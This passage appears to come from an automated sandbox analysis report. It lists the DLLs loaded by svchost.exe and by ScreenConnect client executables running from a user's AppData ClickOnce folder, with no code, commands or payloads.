                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
